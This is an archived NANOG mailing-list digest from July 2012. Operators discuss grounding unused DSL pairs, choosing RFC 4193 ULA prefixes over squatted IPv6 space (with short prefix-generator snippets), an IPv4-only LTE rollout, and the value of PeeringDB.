loss In-Reply-To: <79774.1342539500@turing-police.cc.vt.edu> References: <011601cd6426$b35fb060$1a1f1120$@sstar.com> <24359.1342537189@turing-police.cc.vt.edu> <4288131ED5E3024C9CD4782CECCAD2C716AD0D9C@LMC-MAIL2.exempla.org> <015701cd642f$1f9bd800$5ed38800$@sstar.com> <79774.1342539500@turing-police.cc.vt.edu> Message-ID: <4288131ED5E3024C9CD4782CECCAD2C716AD0D9D@LMC-MAIL2.exempla.org> -----Original Message----- From: valdis.kletnieks at vt.edu [mailto:valdis.kletnieks at vt.edu] > No, it will be strictly a DC current, with the amperage easily calculated from the voltage difference between the two ends and the resistance of > however many cable-feet of wire is involved. Not usually a big deal, unless your termination design didn't include the ability to sink a DC current > 24/7. > (Of course, actually measuring the voltage and resistance may be non-trivial :) That brings up an interesting question. I assumed the ground potential stays the same between 2 points, but have there been any studies to see if it's actually DC, or if there's an AC component to it? If there's an AC component in the ground at either end (or both) that may introduce EM into adjacent pairs across the cable. And are they more or less than the EM ungrounded pairs would pick up? Ken Matlock Network Analyst 303-467-4671 matlockk at exempla.org 
From dougb at dougbarton.us Tue Jul 17 12:43:07 2012 From: dougb at dougbarton.us (Doug Barton) Date: Tue, 17 Jul 2012 10:43:07 -0700 Subject: using "reserved" IPv6 space In-Reply-To: <1342509300.6281.198.camel@karl> References: <2059648.BTFFAkdkz4@lsdsrv> <4742592599634568524@unknownmsgid> <1342500058.6281.154.camel@karl> <894EB7FC-A18C-41BA-A778-85564632FC8E@delong.com> <1342509300.6281.198.camel@karl> Message-ID: <5005A42B.1020606@dougbarton.us> On 7/17/2012 12:15 AM, Karl Auer wrote: > But I do not have an encyclopaedic knowledge of all the RFCs, so > perhaps this has been superseded, obsoleted or updated... This gets a lot easier if you use the tools site: https://tools.ietf.org/html/rfc4291 -- If you're never wrong, you're not trying hard enough From mikea at mikea.ath.cx Tue Jul 17 12:45:35 2012 From: mikea at mikea.ath.cx (Mike Andrews) Date: Tue, 17 Jul 2012 12:45:35 -0500 Subject: Managing free pairs to prevent DSL sync. 
loss In-Reply-To: <4288131ED5E3024C9CD4782CECCAD2C716AD0D9D@LMC-MAIL2.exempla.org> References: <011601cd6426$b35fb060$1a1f1120$@sstar.com> <24359.1342537189@turing-police.cc.vt.edu> <4288131ED5E3024C9CD4782CECCAD2C716AD0D9C@LMC-MAIL2.exempla.org> <015701cd642f$1f9bd800$5ed38800$@sstar.com> <79774.1342539500@turing-police.cc.vt.edu> <4288131ED5E3024C9CD4782CECCAD2C716AD0D9D@LMC-MAIL2.exempla.org> Message-ID: <20120717174535.GA71915@mikea.ath.cx> On Tue, Jul 17, 2012 at 11:16:07AM -0600, Matlock, Kenneth L wrote: > That brings up an interesting question. I assumed the ground potential > stays the same between 2 points, but have there been any studies to see > if it's actually DC, or if there's an AC component to it? That's not a safe assumption, since most power companies use earth grounds for their distribution systems. That means that potential between two points, and the current through the ground between those two points, may vary depending on what's happening in the electrically-near parts of the power distribution system. That's not a happy thought, but it is Real Life. It's one of the reasons we went to fiber between widely-separated buildings in our field sites. In my experience, there are AC and DC components both. They're generally -- but not always -- negligible, unless something goes wrong or one end of the line takes a lightning strike, in which case "ground" can rise to bunchty KV. > If there's an AC component in the ground at either end (or both) that > may introduce EM into adjacent pairs across the cable. And are they more > or less than the EM ungrounded pairs would pick up? Whatever is picked up by ungrounded pairs should be common-mode -- the same on both wires in the pair. Even if it is induced into the "live" pairs in the bundle, it shouldn't affect signalling. In theory, that is. 
-- Mike Andrews, W5EGO mikea at mikea.ath.cx Tired old sysadmin From dougb at dougbarton.us Tue Jul 17 12:49:27 2012 From: dougb at dougbarton.us (Doug Barton) Date: Tue, 17 Jul 2012 10:49:27 -0700 Subject: using "reserved" IPv6 space In-Reply-To: <20120717124713.GA10157@pob.ytti.fi> References: <86a9z1hjzy.fsf@seastrom.com> <50042F34.5080007@gmail.com> <50055A41.2020005@gmail.com> <20120717124713.GA10157@pob.ytti.fi> Message-ID: <5005A5A7.8020706@dougbarton.us> On 7/17/2012 5:47 AM, Saku Ytti wrote: > I wonder who really believes there is no usage case for NAT66. Have these > people seen non-trivial corporate networks? > > I'm sure many people in this list finance part of their lives with renumber > projects costing MUSDs. For many companies just finding out where addresses > have been punched in (your FWs, your software, partner FWs, partner > software, configurations...) will take months, before even starting > renumbering. For those with PA space https://tools.ietf.org/html/rfc6144 should be a good solution. Doug -- If you're never wrong, you're not trying hard enough From johns at sstar.com Tue Jul 17 14:27:01 2012 From: johns at sstar.com (John Souvestre) Date: Tue, 17 Jul 2012 14:27:01 -0500 Subject: Managing free pairs to prevent DSL sync. loss In-Reply-To: <20120717174535.GA71915@mikea.ath.cx> References: <011601cd6426$b35fb060$1a1f1120$@sstar.com> <24359.1342537189@turing-police.cc.vt.edu> <4288131ED5E3024C9CD4782CECCAD2C716AD0D9C@LMC-MAIL2.exempla.org> <015701cd642f$1f9bd800$5ed38800$@sstar.com> <79774.1342539500@turing-police.cc.vt.edu> <4288131ED5E3024C9CD4782CECCAD2C716AD0D9D@LMC-MAIL2.exempla.org> <20120717174535.GA71915@mikea.ath.cx> Message-ID: <001c01cd6452$251c7410$6f555c30$@sstar.com> You could "ground" them via some small capacitors. This would block DC and the low frequency power line trash and even act somewhat as a fuse should there be a lightning strike. John 
John Souvestre - New Orleans LA - (504) 454-0899 -----Original Message----- From: Mike Andrews [mailto:mikea at mikea.ath.cx] Sent: Tuesday, July 17, 2012 12:46 pm To: NANOG Mailing List Subject: Re: Managing free pairs to prevent DSL sync. loss On Tue, Jul 17, 2012 at 11:16:07AM -0600, Matlock, Kenneth L wrote: > That brings up an interesting question. I assumed the ground potential > stays the same between 2 points, but have there been any studies to > see if it's actually DC, or if there's an AC component to it? That's not a safe assumption, since most power companies use earth grounds for their distribution systems. That means that potential between two points, and the current through the ground between those two points, may vary depending on what's happening in the electrically-near parts of the power distribution system. That's not a happy thought, but it is Real Life. It's one of the reasons we went to fiber between widely-separated buildings in our field sites. In my experience, there are AC and DC components both. They're generally -- but not always -- negligible, unless something goes wrong or one end of the line takes a lightning strike, in which case "ground" can rise to bunchty KV. > If there's an AC component in the ground at either end (or both) that > may introduce EM into adjacent pairs across the cable. And are they > more or less than the EM ungrounded pairs would pick up? Whatever is picked up by ungrounded pairs should be common-mode -- the same on both wires in the pair. Even if it is induced into the "live" pairs in the bundle, it shouldn't affect signalling. In theory, that is. 
-- Mike Andrews, W5EGO mikea at mikea.ath.cx Tired old sysadmin From sethm at rollernet.us Tue Jul 17 17:21:22 2012 From: sethm at rollernet.us (Seth Mattinen) Date: Tue, 17 Jul 2012 15:21:22 -0700 Subject: using "reserved" IPv6 space In-Reply-To: <500032E4.40804@gmail.com> References: <500032E4.40804@gmail.com> Message-ID: <5005E562.8060206@rollernet.us> On 7/13/12 7:38 AM, -Hammer- wrote: > OK. I'm pretty sure I'm gonna get some flak for this but I'll share this > question and its background anyway. Please be gentle. > > In the past, with IPv4, we have used reserved or "non-routable" space > Internally in production for segments that won't be seen anywhere else. > Examples? A sync VLAN for some FWs to share state. An IBGP link between > routers that will never be seen or advertised. In those cases, we have > often used 192.0.2.0/24. It's reserved and never used and even if it did > get used one day we aren't "routing" it internally. It's just on > segments where we need some L3 that will never be seen. > > On to IPv6 > > I was considering taking the same approach. Maybe using 0100::/8 or > 1000::/4 or A000::/3 as a space for this. > > Other than the usual "Hey, you shouldn't do that" can anyone give me > some IPv6 specific reasons that I may not be forecasting that would make > it worse doing this than in an IPv4 scenario. I know, not apples to > apples but for this question they are close enough. Unless there is > something IPv6 specific that is influencing this.... > Don't, because there's already a /10 defined for such things. It's called ULA (unique local address) aka RFC 4193. ULAs are not globally routable. 
Here's a calculator that will generate a random one for you: http://bitace.com/ipv6calc/ ~Seth From jeroen at unfix.org Tue Jul 17 17:34:37 2012 From: jeroen at unfix.org (Jeroen Massar) Date: Wed, 18 Jul 2012 00:34:37 +0200 Subject: using "reserved" IPv6 space In-Reply-To: <5005E562.8060206@rollernet.us> References: <500032E4.40804@gmail.com> <5005E562.8060206@rollernet.us> Message-ID: <5005E87D.6060006@unfix.org> On 2012-07-18 00:21, Seth Mattinen wrote: [..] > Don't, because there's already a /10 defined for such things. It's > called ULA (unique local address) aka RFC 4193. ULAs are not globally > routable. > > Here's a calculator that will generate a random one for you: > > http://bitace.com/ipv6calc/ A random one indeed, because the javascript for it is just:
8<-----------------------------------------------------
var calc_private = function() {

    var str = "fd";

    for(i = 0; i<10; i++) {
        str = str + toHex(Math.floor(Math.random()*16));
        if (i % 4 == 1) str = str + ":";
    }

    $("#private_subnet").html("Your private subnet is: "+str+":/48");
    $("#multicast1").val(str+":/48");
    calc_multicast1();
------------------------------------------------------->8
does not follow RFC4193 in any way at all. As such do not use it. The original real RFC4193 ULA generator script can be found at: http://www.kame.net/~suz/gen-ula.html google(ipv6 ula) for another page, that has been referenced often enough on this very list already, if you want to 'register' it there to avoid another small chance of collision, that page also uses the script from the above site for a true RFC4193 prefix. 
Greets, Jeroen From sethm at rollernet.us Tue Jul 17 17:47:01 2012 From: sethm at rollernet.us (Seth Mattinen) Date: Tue, 17 Jul 2012 15:47:01 -0700 Subject: using "reserved" IPv6 space In-Reply-To: <5005E87D.6060006@unfix.org> References: <500032E4.40804@gmail.com> <5005E562.8060206@rollernet.us> <5005E87D.6060006@unfix.org> Message-ID: <5005EB65.90608@rollernet.us> On 7/17/12 3:34 PM, Jeroen Massar wrote: > On 2012-07-18 00:21, Seth Mattinen wrote: > [..] >> Don't, because there's already a /10 defined for such things. It's >> called ULA (unique local address) aka RFC 4193. ULAs are not globally >> routable. >> >> Here's a calculator that will generate a random one for you: >> >> http://bitace.com/ipv6calc/ > > A random one indeed, because the javascript for it is just:
> 8<-----------------------------------------------------
> var calc_private = function() {
>
>     var str = "fd";
>
>     for(i = 0; i<10; i++) {
>         str = str + toHex(Math.floor(Math.random()*16));
>         if (i % 4 == 1) str = str + ":";
>     }
>
>     $("#private_subnet").html("Your private subnet is: "+str+":/48");
>     $("#multicast1").val(str+":/48");
>     calc_multicast1();
> ------------------------------------------------------->8
> > does not follow RFC4193 in any way at all. As such do not use it. > > The original real RFC4193 ULA generator script can be found at: > http://www.kame.net/~suz/gen-ula.html > > google(ipv6 ula) for another page, that has been referenced often enough > on this very list already, if you want to 'register' it there to avoid > another small chance of collision, that page also uses the script from > the above site for a true RFC4193 prefix. > Oh well, so much for the googles. Still, don't make up your own squat range for "private" IPv6 space. Use ULA if you really want such a thing. 
~Seth From jeroen at unfix.org Tue Jul 17 17:57:27 2012 From: jeroen at unfix.org (Jeroen Massar) Date: Wed, 18 Jul 2012 00:57:27 +0200 Subject: using "reserved" IPv6 space In-Reply-To: <5005EB65.90608@rollernet.us> References: <500032E4.40804@gmail.com> <5005E562.8060206@rollernet.us> <5005E87D.6060006@unfix.org> <5005EB65.90608@rollernet.us> Message-ID: <5005EDD7.1040304@unfix.org> On 2012-07-18 00:47, Seth Mattinen wrote: [..] >>> Here's a calculator that will generate a random one for you: >>> >>> http://bitace.com/ipv6calc/ >> >> A random one indeed, because the javascript for it is just: [..] >> does not follow RFC4193 in any way at all. A such do not use it. >> >> The original real RFC4193 ULA generator script can be found at: >> http://www.kame.net/~suz/gen-ula.html >> >> google(ipv6 ula) for another page, that has been referenced often enough >> on this very list already, if you want to 'register' it there to avoid >> another small chance of collision, that page also uses the script from >> the above site for a true RFC4193 prefix. >> > > > Oh well, so much for the googles. Yes, it is a shame that the bitace thing references RFC4193 and then does not use it. Lets Bcc: them and see if they act upon, you never know if they fix things or not, there are good guys still left on these Internets. > Still, don't make up your own squat > range for "private" IPv6 space. Use ULA if you really want such a thing. I am wondering what you meaning with 'squat', note that what I reference above is real full RFC4193 calculated ULA. The optional registration thingy is just optional for those that don't trust probability and want to have a little more security. Also lots of folks like to claim something as their own and well storage bits are cheap for that little amount of info and reassures a lot of folks. 
Greets, Jeroen From jeroen at unfix.org Tue Jul 17 17:59:41 2012 From: jeroen at unfix.org (Jeroen Massar) Date: Wed, 18 Jul 2012 00:59:41 +0200 Subject: using "reserved" IPv6 space In-Reply-To: <5005EDD7.1040304@unfix.org> References: <500032E4.40804@gmail.com> <5005E562.8060206@rollernet.us> <5005E87D.6060006@unfix.org> <5005EB65.90608@rollernet.us> <5005EDD7.1040304@unfix.org> Message-ID: <5005EE5D.4050504@unfix.org> On 2012-07-18 00:57, Jeroen Massar wrote: > On 2012-07-18 00:47, Seth Mattinen wrote: > [..] >>>> Here's a calculator that will generate a random one for you: >>>> >>>> http://bitace.com/ipv6calc/ [..] > Yes, it is a shame that the bitace thing references RFC4193 and then > does not use it. Lets Bcc: them and see if they act upon, you never know > if they fix things or not, there are good guys still left on these > Internets. So much for gmail never fails: : host aspmx.l.google.com[173.194.70.26] said: 550-5.1.1 The email account that you tried to reach does not exist. Please try 550-5.1.1 double-checking the recipient's email address for typos or 550-5.1.1 unnecessary spaces. Learn more at 550 5.1.1 http://support.google.com/mail/bin/answer.py?answer=6596 p20si34103229wiv.37 (in reply to RCPT TO command) If anybody does have a contact @bitace.com don't hesitate to forward them this discussion. Now also bcc'd to the contact in whois for the domain. Greets, Jeroen From sethm at rollernet.us Tue Jul 17 18:36:54 2012 From: sethm at rollernet.us (Seth Mattinen) Date: Tue, 17 Jul 2012 16:36:54 -0700 Subject: using "reserved" IPv6 space In-Reply-To: <5005EDD7.1040304@unfix.org> References: <500032E4.40804@gmail.com> <5005E562.8060206@rollernet.us> <5005E87D.6060006@unfix.org> <5005EB65.90608@rollernet.us> <5005EDD7.1040304@unfix.org> Message-ID: <5005F716.4060708@rollernet.us> On 7/17/12 3:57 PM, Jeroen Massar wrote: > > I am wondering what you meaning with 'squat', note that what I reference > above is real full RFC4193 calculated ULA. 
> By "squat" I meant take a random chunk of IPv6 space and use it as "private" address space. He said: On 7/13/12 7:38 AM, -Hammer- wrote: > I was considering taking the same approach. Maybe using 0100::/8 or > 1000::/4 or A000::/3 as a space for this. And I would say no, use ULA space instead since it's set aside for such things. ~Seth From bross at pobox.com Tue Jul 17 18:46:39 2012 From: bross at pobox.com (Brandon Ross) Date: Tue, 17 Jul 2012 19:46:39 -0400 (EDT) Subject: Adtran NetVanta deployment experience Message-ID: I'd like to speak to someone who's had deployment experience around the Adtran NetVanta product line that has used it's firewalling and/or VPN functionality. Feel free to reply off-list. I'm trying to get an idea of real-world performance expectations. -- Brandon Ross Yahoo & AIM: BrandonNRoss +1-404-635-6667 ICQ: 2269442 Schedule a meeting: https://tungle.me/bross Skype: brandonross From cb.list6 at gmail.com Tue Jul 17 18:53:57 2012 From: cb.list6 at gmail.com (Cameron Byrne) Date: Tue, 17 Jul 2012 16:53:57 -0700 Subject: Another LTE network turns up as IPv4-only squat space + NAT Message-ID: FYI http://www.dslreports.com/forum/r27324698-LTE-access-early- So much for next generation technology ... CB From marka at isc.org Tue Jul 17 19:15:17 2012 From: marka at isc.org (Mark Andrews) Date: Wed, 18 Jul 2012 10:15:17 +1000 Subject: using "reserved" IPv6 space In-Reply-To: Your message of "Wed, 18 Jul 2012 00:34:37 +0200." <5005E87D.6060006@unfix.org> References: <500032E4.40804@gmail.com> <5005E562.8060206@rollernet.us> <5005E87D.6060006@unfix.org> Message-ID: <20120718001518.602A4229D042@drugs.dv.isc.org> In message <5005E87D.6060006 at unfix.org>, Jeroen Massar writes: > On 2012-07-18 00:21, Seth Mattinen wrote: > [..] > > Don't, because there's already a /10 defined for such things. It's > > called ULA (unique local address) aka RFC 4193. ULAs are not globally > > routable. 
> > > > Here's a calculator that will generate a random one for you: > > > > http://bitace.com/ipv6calc/ > > A random one indeed, because the javascript for it is just: > 8<----------------------------------------------------- > var calc_private = function() { > > var str = "fd"; > > for(i = 0; i<10; i++) { > str = str + toHex(Math.floor(Math.random()*16)); > if (i % 4 == 1) str = str + ":"; > } > > $("#private_subnet").html("Your private subnet is: > "+str+":/48"); > $("#multicast1").val(str+":/48"); > calc_multicast1(); > ------------------------------------------------------->8 > > does not follow RFC4193 in any way at all. A such do not use it. If you have a true random number source you don't need to use the method in RFC4193. The method in RFC4193 is designed to get produce a good enough pseudo source of randomness. > The original real RFC4193 ULA generator script can be found at: > http://www.kame.net/~suz/gen-ula.html > > google(ipv6 ula) for another page, that has been referenced often enough > on this very list already, if you want to 'register' it there to avoid > another small chance of collision, that page also uses the script from > the above site for a true RFC4193 prefix. > > Greets, > Jeroen > -- Mark Andrews, ISC 1 Seymour St., Dundas Valley, NSW 2117, Australia PHONE: +61 2 9871 4742 INTERNET: marka at isc.org From trejrco at gmail.com Tue Jul 17 19:40:07 2012 From: trejrco at gmail.com (TJ) Date: Tue, 17 Jul 2012 20:40:07 -0400 Subject: Another LTE network turns up as IPv4-only squat space + NAT In-Reply-To: References: Message-ID: On Jul 17, 2012 7:54 PM, "Cameron Byrne" wrote: > > FYI http://www.dslreports.com/forum/r27324698-LTE-access-early- > > So much for next generation technology ... No IPv6, and using duplicate IPv4 space. #sigh #fail /TJ From streiner at cluebyfour.org Tue Jul 17 23:24:36 2012 From: streiner at cluebyfour.org (Justin M. 
Streiner)
Date: Wed, 18 Jul 2012 00:24:36 -0400 (EDT)
Subject: Another LTE network turns up as IPv4-only squat space + NAT
In-Reply-To:
References:
Message-ID:

On Tue, 17 Jul 2012, Cameron Byrne wrote:

> FYI http://www.dslreports.com/forum/r27324698-LTE-access-early-

Short-sighted and foolish. Shame on you, Sprint.

jms

From saku at ytti.fi Wed Jul 18 02:04:05 2012
From: saku at ytti.fi (Saku Ytti)
Date: Wed, 18 Jul 2012 10:04:05 +0300
Subject: using "reserved" IPv6 space
In-Reply-To: <5005E87D.6060006@unfix.org>
References: <500032E4.40804@gmail.com> <5005E562.8060206@rollernet.us> <5005E87D.6060006@unfix.org>
Message-ID: <20120718070405.GA10591@pob.ytti.fi>

On (2012-07-18 00:34 +0200), Jeroen Massar wrote:

> > Here's a calculator that will generate a random one for you:
>
> does not follow RFC4193 in any way at all. A such do not use it.

Another silly oneliner, not RFC4193.

ruby -e'p ("fd"+rand(2**40).to_s(16).rjust(10,"0")).scan(/.{1,4}/).join(":")+"::/48"'

I'm not sure if RFC4193 is best way to generate random part, it should be
possible to incorporate RFC2777 verifiability to it. It would allow
operators to prove people who got memorable addresses were not favoured and
it would allow the people who generated them to prove they used accepted
methods to generate them.

However I'm not sure what would be good seed? ISO3166 alpha2 +
domestic_business_id + 0..n (for nth block you needed)

In practice I'm sure we'll notice bias in random numbers towards 0. As many
people who've not been through painful enough M&A renumbers will opt for
memorable addresses.

--
  ++ytti

From valdis.kletnieks at vt.edu Wed Jul 18 08:10:33 2012
From: valdis.kletnieks at vt.edu (valdis.kletnieks at vt.edu)
Date: Wed, 18 Jul 2012 09:10:33 -0400
Subject: using "reserved" IPv6 space
In-Reply-To: Your message of "Wed, 18 Jul 2012 10:04:05 +0300."
<20120718070405.GA10591@pob.ytti.fi> References: <500032E4.40804@gmail.com> <5005E562.8060206@rollernet.us> <5005E87D.6060006@unfix.org> <20120718070405.GA10591@pob.ytti.fi> Message-ID: <34110.1342617033@turing-police.cc.vt.edu> On Wed, 18 Jul 2012 10:04:05 +0300, Saku Ytti said: > However I'm not sure what would be good seed? ISO3166 alpha2 + > domestic_business_id + 0..n (for nth block you needed) You want to roll in at some entropy by adding in the current date or something, so two "Joes' Burritos and Internet" in 2 different states don't generate the same value. There's a reason that 4193 recommends a 64bit timestamp and an EUI64. -------------- next part -------------- A non-text attachment was scrubbed... Name: not available Type: application/pgp-signature Size: 865 bytes Desc: not available URL: From saku at ytti.fi Wed Jul 18 08:25:02 2012 From: saku at ytti.fi (Saku Ytti) Date: Wed, 18 Jul 2012 16:25:02 +0300 Subject: using "reserved" IPv6 space In-Reply-To: <34110.1342617033@turing-police.cc.vt.edu> References: <500032E4.40804@gmail.com> <5005E562.8060206@rollernet.us> <5005E87D.6060006@unfix.org> <20120718070405.GA10591@pob.ytti.fi> <34110.1342617033@turing-police.cc.vt.edu> Message-ID: <20120718132502.GA11293@pob.ytti.fi> On (2012-07-18 09:10 -0400), valdis.kletnieks at vt.edu wrote: > You want to roll in at some entropy by adding in the current date or > something, so two "Joes' Burritos and Internet" in 2 different states don't > generate the same value. There's a reason that 4193 recommends > a 64bit timestamp and an EUI64. I assume business ids are federal not state, as IRS is federal? Anyhow I'm not saying 'this is how it should be done', I'm saying maybe there is way to do this in a way which is verifiably random. 64b timestamp and EUI64 make it non-verifiable. I think it would be nice, that people who play by the rules are able to prove they did. Otherwise you can generate it any way you want and claim you did it the right way. 
-- ++ytti From stephen at sprunk.org Wed Jul 18 08:37:08 2012 From: stephen at sprunk.org (Stephen Sprunk) Date: Wed, 18 Jul 2012 08:37:08 -0500 Subject: using "reserved" IPv6 space In-Reply-To: <20120718070405.GA10591@pob.ytti.fi> References: <500032E4.40804@gmail.com> <5005E562.8060206@rollernet.us> <5005E87D.6060006@unfix.org> <20120718070405.GA10591@pob.ytti.fi> Message-ID: <5006BC04.1000306@sprunk.org> On 18-Jul-12 02:04, Saku Ytti wrote: > On (2012-07-18 00:34 +0200), Jeroen Massar wrote: >>> Here's a calculator that will generate a random one for you: >> does not follow RFC4193 in any way at all. A such do not use it. > I'm not sure if RFC4193 is best way to generate random part, It's not claimed to be the "best" way, just one of many possible good ways. If you can demonstrate that your way is at least as good, go for it. > it should bepossible to incorporate RFC2777 verifiability to it. There is no need for that, since your failure to use a good source of randomness hurts nobody except yourself. If you're too lazy to come up with a good method yourself, as most people are, there are several online RFC 4193-compliant prefix generators that will save you the effort. At least one even includes the ability to record your results and be assured (within the margin of best-effort service) that you will not collide with anyone else who does so. S -- Stephen Sprunk "God does not play dice." --Albert Einstein CCIE #3723 "God is an inveterate gambler, and He throws the K5SSS dice at every possible opportunity." --Stephen Hawking -------------- next part -------------- A non-text attachment was scrubbed... 
Name: smime.p7s Type: application/pkcs7-signature Size: 2312 bytes Desc: S/MIME Cryptographic Signature URL: From stephen at sprunk.org Wed Jul 18 08:47:57 2012 From: stephen at sprunk.org (Stephen Sprunk) Date: Wed, 18 Jul 2012 08:47:57 -0500 Subject: using "reserved" IPv6 space In-Reply-To: <20120718132502.GA11293@pob.ytti.fi> References: <500032E4.40804@gmail.com> <5005E562.8060206@rollernet.us> <5005E87D.6060006@unfix.org> <20120718070405.GA10591@pob.ytti.fi> <34110.1342617033@turing-police.cc.vt.edu> <20120718132502.GA11293@pob.ytti.fi> Message-ID: <5006BE8D.5080705@sprunk.org> On 18-Jul-12 08:25, Saku Ytti wrote: > On (2012-07-18 09:10 -0400), valdis.kletnieks at vt.edu wrote: >> You want to roll in at some entropy by adding in the current date or something, so two "Joes' Burritos and Internet" in 2 different states don't generate the same value. There's a reason that 4193 recommends a 64bit timestamp and an EUI64. > I assume business ids are federal not state, as IRS is federal? Anyhow I'm not saying 'this is how it should be done', I'm saying maybe there is way to do this in a way which is verifiably random. US EINs/SSNs, and various state-level ID numbers, are not random; given our problems with identity theft, they're not guaranteed to be unique, either. I assume the same is true for identification numbers in most other countries. > 64b timestamp and EUI64 make it non-verifiable. If you publish the numbers you used, then others can verify that those values are reasonable. I doubt anyone would sift through billions of reasonable timestamps combined with the thousands of EUI64s at their site just to find a result that was "memorable". And, if they did, who cares? It's not like it hurts me for them to do so--unless I'm dumb enough to do the same thing, happened to get the same result /and/ happened to merge with them--all of which are still unlikely events. S -- Stephen Sprunk "God does not play dice." 
--Albert Einstein CCIE #3723 "God is an inveterate gambler, and He throws the K5SSS dice at every possible opportunity." --Stephen Hawking -------------- next part -------------- A non-text attachment was scrubbed... Name: smime.p7s Type: application/pkcs7-signature Size: 2312 bytes Desc: S/MIME Cryptographic Signature URL: From saku at ytti.fi Wed Jul 18 08:48:00 2012 From: saku at ytti.fi (Saku Ytti) Date: Wed, 18 Jul 2012 16:48:00 +0300 Subject: using "reserved" IPv6 space In-Reply-To: <5006BC04.1000306@sprunk.org> References: <500032E4.40804@gmail.com> <5005E562.8060206@rollernet.us> <5005E87D.6060006@unfix.org> <20120718070405.GA10591@pob.ytti.fi> <5006BC04.1000306@sprunk.org> Message-ID: <20120718134800.GA11320@pob.ytti.fi> On (2012-07-18 08:37 -0500), Stephen Sprunk wrote: > > it should bepossible to incorporate RFC2777 verifiability to it. > > There is no need for that, since your failure to use a good source of > randomness hurts nobody except yourself. I think you're making fact out of opinion. Maybe SP is generating ULAs for their customers. Maybe they'd like to be able to prove in case of dispute that other customer with memorable ULA was not favoured. Maybe someone claims I'm not using BCP methods for ULA selection, and I'd like to be able to falsify those claims. Obviously I could come up with some own RRFC2777 style algo to generate ULA, but if it would be internally documented it would hardly be provable, as I couldn't prove I haven't come up with the algo after generating the prefix. Maybe this is not practical enough concern, but I'm wondering, what is the downside? What is the benefit of recommending method which is not testable/provable. 
-- ++ytti From saku at ytti.fi Wed Jul 18 09:00:59 2012 From: saku at ytti.fi (Saku Ytti) Date: Wed, 18 Jul 2012 17:00:59 +0300 Subject: using "reserved" IPv6 space In-Reply-To: <5006BE8D.5080705@sprunk.org> References: <500032E4.40804@gmail.com> <5005E562.8060206@rollernet.us> <5005E87D.6060006@unfix.org> <20120718070405.GA10591@pob.ytti.fi> <34110.1342617033@turing-police.cc.vt.edu> <20120718132502.GA11293@pob.ytti.fi> <5006BE8D.5080705@sprunk.org> Message-ID: <20120718140059.GA11329@pob.ytti.fi> On (2012-07-18 08:47 -0500), Stephen Sprunk wrote: > And, if they did, who cares? It's not like it hurts me for them to do > so--unless I'm dumb enough to do the same thing, happened to get the > same result /and/ happened to merge with them--all of which are still > unlikely events. In which case, you could prove you did the right thing. I'm not disagreeing with you that benefits are marginal (I think most 'randomly' choose 0 anyhow). I'm asking, what would the recommend method lose by being verifiable? -- ++ytti From mike at mtcc.com Wed Jul 18 09:26:25 2012 From: mike at mtcc.com (Michael Thomas) Date: Wed, 18 Jul 2012 07:26:25 -0700 Subject: using "reserved" IPv6 space In-Reply-To: <34110.1342617033@turing-police.cc.vt.edu> References: <500032E4.40804@gmail.com> <5005E562.8060206@rollernet.us> <5005E87D.6060006@unfix.org> <20120718070405.GA10591@pob.ytti.fi> <34110.1342617033@turing-police.cc.vt.edu> Message-ID: <5006C791.90200@mtcc.com> On 07/18/2012 06:10 AM, valdis.kletnieks at vt.edu wrote: > On Wed, 18 Jul 2012 10:04:05 +0300, Saku Ytti said: > >> However I'm not sure what would be good seed? ISO3166 alpha2 + >> domestic_business_id + 0..n (for nth block you needed) > You want to roll in at some entropy by adding in the current date or > something, so two "Joes' Burritos and Internet" in 2 different states don't > generate the same value. There's a reason that 4193 recommends > a 64bit timestamp and an EUI64. 
> ulamart.com is available for the enterprising amongst us... Mike From cgrundemann at gmail.com Wed Jul 18 10:43:32 2012 From: cgrundemann at gmail.com (Chris Grundemann) Date: Wed, 18 Jul 2012 09:43:32 -0600 Subject: Why use PeeringDB? Message-ID: Peering Experts, I am currently working on a BCOP for IPv6 Peering and Transit and would very much appreciate some expert information on why using PeeringDB is a best practice (or why its not). All opinions are welcome, but be aware that I plan on using the responses to enhance the document, which will be made publicly available as one of several (and hopefully many more) BCOPs published at http://www.ipbcop.org/. Also, if there are those among you who would like to review the entire document and perhaps volunteer as a SME to help expand and polish it, please contact me off-list and I'll get you a current draft. Thanks in advance. Cheers, ~Chris -- @ChrisGrundemann http://chrisgrundemann.com From djahandarie at gmail.com Wed Jul 18 10:55:41 2012 From: djahandarie at gmail.com (Darius Jahandarie) Date: Wed, 18 Jul 2012 11:55:41 -0400 Subject: Why use PeeringDB? In-Reply-To: References: Message-ID: On Wed, Jul 18, 2012 at 11:43 AM, Chris Grundemann wrote: > I am currently working on a BCOP for IPv6 Peering and Transit and > would very much appreciate some expert information on why using > PeeringDB is a best practice (or why its not). All opinions are > welcome, but be aware that I plan on using the responses to enhance > the document, which will be made publicly available as one of several > (and hopefully many more) BCOPs published at http://www.ipbcop.org/. Well, PeeringDB is basically the first stop for anyone who wants to potentially peer with you, or has received a peering request from you. (Some people even scrape the database to find potential peers based on traffic levels and existing peering locations.) 
A database of easy-to-access contact information, internet exchanges, and facilities is a boon to even non-peering tasks, such as finding a noc email. Basically, if you have a clue and want to peer, or even just be a good netizen, having and maintaining an up-to-date PeeringDB entry is a good idea. Simple as that. -- Darius Jahandarie From jof at thejof.com Wed Jul 18 10:56:44 2012 From: jof at thejof.com (Jonathan Lassoff) Date: Wed, 18 Jul 2012 08:56:44 -0700 Subject: Why use PeeringDB? In-Reply-To: References: Message-ID: On Wed, Jul 18, 2012 at 8:43 AM, Chris Grundemann wrote: > I am currently working on a BCOP for IPv6 Peering and Transit and > would very much appreciate some expert information on why using > PeeringDB is a best practice (or why its not). All opinions are > welcome, but be aware that I plan on using the responses to enhance > the document, which will be made publicly available as one of several > (and hopefully many more) BCOPs published at http://www.ipbcop.org/. It's a nice resource for finding out which networks are in which facilities. As someone seeking out and setting up peering sessions, it's useful to be able to search out networks that also have a couple common POPs, so that one can call or email them and ask about potential interconnection. It's certain cut down on emails that are just requests for information ("Where do you have sites? We're in these metros...", "Looks like we'd be good potential peers, what's your policy like?"). Overall -- I really like it! 
